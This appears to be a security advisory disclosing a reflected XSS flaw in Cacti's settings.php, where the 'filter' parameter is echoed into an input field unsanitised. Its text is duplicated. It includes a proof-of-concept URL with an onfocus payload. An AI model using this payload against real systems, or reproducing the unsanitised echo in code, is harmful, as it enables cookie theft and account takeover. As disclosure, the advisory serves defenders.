Summary
A reflection XSS vulnerability allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies.
Details
In
|
print '<td><input type="text" size="25" id="filter" value="' . get_request_var('filter') . '"></td>'; |
, the value of
get_request_var('filter')
is printed directly without any sanitization.
PoC
http://localhost/cacti/settings.php?tab=path&filter=xxx%22%20onfocus=%27alert(1)%27%20%22
Summary
A reflection XSS vulnerability allows attackers to obtain cookies of administrator and other users and fake their login using obtained cookies.
Details
In
cacti/settings.php
Line 66 in 08497b8
get_request_var('filter')
is printed directly without any sanitization.PoC
http://localhost/cacti/settings.php?tab=path&filter=xxx%22%20onfocus=%27alert(1)%27%20%22